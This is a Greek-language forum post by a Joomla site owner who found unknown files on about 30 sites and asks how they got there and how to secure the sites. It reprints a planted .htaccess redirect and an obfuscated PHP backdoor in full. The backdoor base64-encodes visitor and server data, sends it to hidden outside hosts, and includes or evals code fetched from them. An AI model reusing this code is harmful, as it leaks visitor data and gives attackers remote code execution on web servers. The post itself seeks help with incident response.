Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked
Posted: Sun Aug 24, 2008 3:09 pm
Τρέχω 30 Joomla sites και στα περισσότερα βρήκα μερικά αρχεία τα οποία δεν ανέβασα εγώ σε αρκετούς φακέλους
Το ένα είναι ενα .htaccess file
Και το άλλος αριθμός.php π.χ. 107004.php
Υπάρχει και ένα error_log file στον ίδιο φάκελο
Πως ανέβασαν αυτά τα αρχεία; Πως μπορώ να διασφαλίσω την ασφάλεια των ιστοσελίδων μου; αν απλά διαγράψω αυτά τα αρχεία θα είναι εντάξη η ασφάλεια της ιστοσελίδας;
Το ένα είναι ενα .htaccess file
Code: Select all
Options -MultiViews
ErrorDocument 404 //administrator/components/com_joomlaxplorer/ftp_tmp/107004.php
Options -MultiViews
ErrorDocument 404 /administrator/components/com_joomlaxplorer/ftp_tmp/107004.php
Code: Select all
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
Code: Select all
[06-Feb-2008 16:12:46] PHP Warning: Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[06-Feb-2008 16:12:46] PHP Warning: Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[07-Feb-2008 06:07:49] PHP Warning: Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0